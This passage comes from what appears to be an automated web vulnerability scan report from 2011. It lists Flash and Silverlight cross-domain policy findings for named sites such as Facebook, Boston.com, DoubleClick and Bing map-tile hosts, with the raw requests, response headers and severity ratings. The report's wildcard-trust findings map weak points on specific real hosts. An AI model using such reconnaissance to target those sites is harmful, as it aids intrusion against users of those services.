<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.72. http://www.myspace.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 14 Jul 2011 20:16:10 GMT
Accept-Ranges: bytes
ETag: "0a1dade6242cc1:0"
Server: Microsoft-IIS/7.5
X-Server: 3fa02f8c17d84938b9f7badb240f47c049a93c0d0fb9823f
X-PoweredBy: The fire of 1,000 SUNS!
Date: Tue, 19 Jul 2011 14:28:33 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

5.73. http://www.res-x.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 16:04:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

5.74. http://www.stumbleupon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Tue, 19 Jul 2011 14:28:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

5.75. http://www.ticketmaster.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Vary: Cookie
Last-Modified: Mon, 06 Jun 2011 17:11:27 GMT
ETag: "4c3-3197cdc0"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.com" />
...[SNIP]...
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...

5.76. http://boston.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:33 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: seanburns
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=7;expires=Wed, 22-Jun-2016 20:43:33 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />

...[SNIP]...
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

5.77. http://cache.boston.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.boston.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:23:53 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Content-Type: application/xml
Last-Modified: Mon, 17 Aug 2009 15:11:15 GMT
ETag: "86335a-4b6-47157d029df7f"
Accept-Ranges: bytes
Served-By: alechill
Age: 1196
Cache-Control: max-age=3600
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:23:53 GMT
Via: 1.0 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 1206
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
...[SNIP]...
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
...[SNIP]...

5.78. http://rmedia.boston.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rmedia.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
ETag: "4302db-51e-191508c0"
Accept-Ranges: bytes
Content-Length: 1310
Keep-Alive: timeout=300, max=114
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
...[SNIP]...
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

5.79. http://www.boston.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:48 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: garrick
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=8;expires=Wed, 22-Jun-2016 20:43:48 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
...[SNIP]...
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

6. Silverlight cross-domain policy previous next
There are 29 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://c.atdmt.com/clientaccesspolicy.xml
http://dev.virtualearth.net/clientaccesspolicy.xml
http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml
http://ecn.dev.virtualearth.net/clientaccesspolicy.xml
http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml
http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml
http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml
http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml
http://farecastcom.122.2o7.net/clientaccesspolicy.xml
http://img1.catalog.video.msn.com/clientaccesspolicy.xml
http://img2.catalog.video.msn.com/clientaccesspolicy.xml
http://img3.catalog.video.msn.com/clientaccesspolicy.xml
http://img4.catalog.video.msn.com/clientaccesspolicy.xml
http://metrics.boston.com/clientaccesspolicy.xml
http://metrics.ticketmaster.com/clientaccesspolicy.xml
http://metrics.versionone.com/clientaccesspolicy.xml
http://wa.stubhub.com/clientaccesspolicy.xml
http://a1.bing4.com/clientaccesspolicy.xml
http://a2.bing4.com/clientaccesspolicy.xml
http://a3.bing4.com/clientaccesspolicy.xml
http://a4.bing4.com/clientaccesspolicy.xml
http://api.bing.com/clientaccesspolicy.xml
http://ts1.mm.bing.net/clientaccesspolicy.xml
http://ts2.mm.bing.net/clientaccesspolicy.xml
http://ts3.mm.bing.net/clientaccesspolicy.xml
http://ts4.mm.bing.net/clientaccesspolicy.xml
http://profile.live.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 19 Jul 2011 14:58:32 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.3. http://c.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 14:24:25 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

6.4. http://dev.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dev.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:46 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.5. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.api.tiles.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.api.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Wed, 13 Jul 2011 18:25:34 GMT
Accept-Ranges: bytes
ETag: "89839418a41cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:41 GMT
Connection: close
Content-Length: 458

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.6. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.dev.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:43 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t0.tiles.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 428798
Date: Tue, 19 Jul 2011 12:24:12 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:17:34 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t1.tiles.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 426301
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:59:09 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t2.tiles.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 427286
Date: Tue, 19 Jul 2011 12:24:14 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:42:48 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ecn.t3.tiles.virtualearth.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 421084
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 15:26:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.11. http://farecastcom.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://farecastcom.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www334
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.12. http://img1.catalog.video.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img1.catalog.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:55 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.13. http://img2.catalog.video.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img2.catalog.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:59 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.14. http://img3.catalog.video.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img3.catalog.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:56 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.15. http://img4.catalog.video.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img4.catalog.video.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:57 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.16. http://metrics.boston.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.boston.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:15 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.17. http://metrics.ticketmaster.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.ticketmaster.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
xserver: www416
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.18. http://metrics.versionone.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.versionone.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:36 GMT
Server: Omniture DC/2.0.0
xserver: www277
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
